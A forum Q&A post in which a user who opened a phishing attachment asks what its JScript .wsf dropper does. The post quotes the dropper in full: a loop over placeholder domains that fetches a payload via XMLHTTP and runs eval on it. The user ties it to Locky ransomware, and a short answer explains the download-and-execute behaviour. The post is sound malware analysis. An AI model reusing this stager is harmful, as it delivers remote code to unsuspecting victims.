# What exactly is the following .wsf email attack trying to do?

Tags: malware, wsh

I received one of those “FedEx package could not be delivered, please open the .doc attached” -emails recently. Since I had recently ordered stuff online and since I’m apparently an idiot, I clicked the attachment open. Luckily I was using Linux so no harm done for opening the “filename.doc.wsf”. I did, however get curious on what exactly is the following snippet contained in it is trying to do.

According to my Googling, the final goal is to install a malware called Locky on a Windows system. The different domains where the malware is trying to get downloaded from are listed in the array x[], and the first few lines inside the for-loop seem to construct the whole url from snippets. (I assume it has been broken down to try to avoid spam detection.) But starting from "try " I can't quite follow what is going on?

```
<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com"); 
var y = "Msxml2.XMLHTTP"; 
for (var i=0; i<5; i++) 
    { 
        x[i] = "http://" + x[i]; 
        x[i] += "/co"; 
        x[i] += "unter/"; 
        x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw"; 
        try { 
                var z = new ActiveXObject(y); 
                z.open("GET", x[i], false);
                z.send(); 
                if (z.status == 200) 
                { 
                    eval(z.responseText.split("~").join("a")); 
                    break; 
                }; 
             } 
        catch(e) { }; 
    };
</script></job>
```

Answer (score 0, accepted):

It simply sends an HTTP get request to 5 different URLs and evaluates the content retrieved from the URL.

It's a simple way to execute code from remote locations on your PC. You can change the remote code without changing this script thus making your logic more flexible.